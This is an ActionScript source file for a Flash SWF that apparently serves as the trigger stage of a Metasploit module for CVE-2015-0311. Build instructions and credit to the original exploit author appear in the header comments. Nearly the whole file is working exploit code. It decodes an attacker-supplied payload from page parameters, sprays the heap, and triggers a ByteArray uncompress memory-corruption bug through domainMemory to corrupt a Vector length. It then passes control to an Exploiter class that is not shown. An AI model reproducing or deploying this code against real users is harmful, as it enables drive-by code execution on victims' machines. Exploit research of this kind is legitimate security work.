// Build how to:
// 1. Download the AIRSDK, and use its compiler.
// 3. Download the Flex SDK (4.6)
// 4. Copy the Flex SDK libs (<FLEX_SDK>/framework/libs) to the AIRSDK folder (<AIR_SDK>/framework/libs)
// (all of them, including subfolders, especially mx, which is necessary for the Base64Decoder)
// 5. Build with: mxmlc -o msf.swf Exploit.as
// Original exploit by @hdarwin89 // http://blog.hacklab.kr/flash-cve-2015-0311-%EB%B6%84%EC%84%9D/
package
{
import flash.display.Sprite
import flash.display.LoaderInfo
import flash.system.ApplicationDomain
import flash.utils.ByteArray
import avm2.intrinsics.memory.*
import flash.external.ExternalInterface
import mx.utils.Base64Decoder
// Entry point of the SWF built for the CVE-2015-0311 Metasploit module.
// All work happens in the constructor: the loader parameters (pl, os, sh)
// supplied by the embedding page are read, the base64 payload in "sh" is
// decoded, and the result is handed to Exploiter (defined elsewhere in the
// project, together with Logger).
public class Exploit extends Sprite
{
    private var data:uint = 0xdeaddead                   // counter value written repeatedly into ba
    private var uv:Vector.<uint> = new Vector.<uint>
    private var ba:ByteArray = new ByteArray()           // installed as domainMemory in the constructor
    private var exploiter:Exploiter                      // project type, not imported here
    private var b64:Base64Decoder = new Base64Decoder()
    private var payload:ByteArray                        // decoded contents of the "sh" parameter
    private var platform:String                          // the "pl" parameter
    private var os:String                                // the "os" parameter

    // Constructor; there is no other public method. On the self-check failure
    // below it logs the value read and returns without creating the Exploiter.
    public function Exploit()
    {
        platform = LoaderInfo(this.root.loaderInfo).parameters.pl
        os = LoaderInfo(this.root.loaderInfo).parameters.os
        var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
        // Spaces are mapped back to '+' before decoding — presumably the '+'
        // characters of the base64 text were turned into spaces on the way in;
        // verify against the module that builds the parameters.
        var pattern:RegExp = / /g;
        b64_payload = b64_payload.replace(pattern, "+")
        b64.decode(b64_payload)
        payload = b64.toByteArray()
        // defrag
        for (var i:uint = 0; i < 10000; i++) new Vector.<uint>(0x3e0)
        for (i = 0; i < 1000; i++) ba.writeUnsignedInt(data++)
        ba.compress()
        ApplicationDomain.currentDomain.domainMemory = ba
        ba.position = 0x200
        for (i = 0; i < ba.length - ba.position; i++) ba.writeByte(00)
        // Any Error thrown by uncompress() is deliberately swallowed (empty catch).
        try {
            ba.uncompress()
        } catch (e:Error) { }
        uv = new Vector.<uint>(0x3e0)
        uv[0] = 0
        // li32/si32 come from avm2.intrinsics.memory and operate on domainMemory (ba).
        var test:uint = li32(0)
        if (test == 0x3e0) {
            si32(0xffffffff, 0) // corrupted
        } else {
            // Self-check failed: report the value read (hex) and stop here.
            Logger.log('[*] Exploit - corruption fail: ' + test.toString(16))
            return // something failed
        }
        exploiter = new Exploiter(this, platform, os, payload, uv)
    }
}
}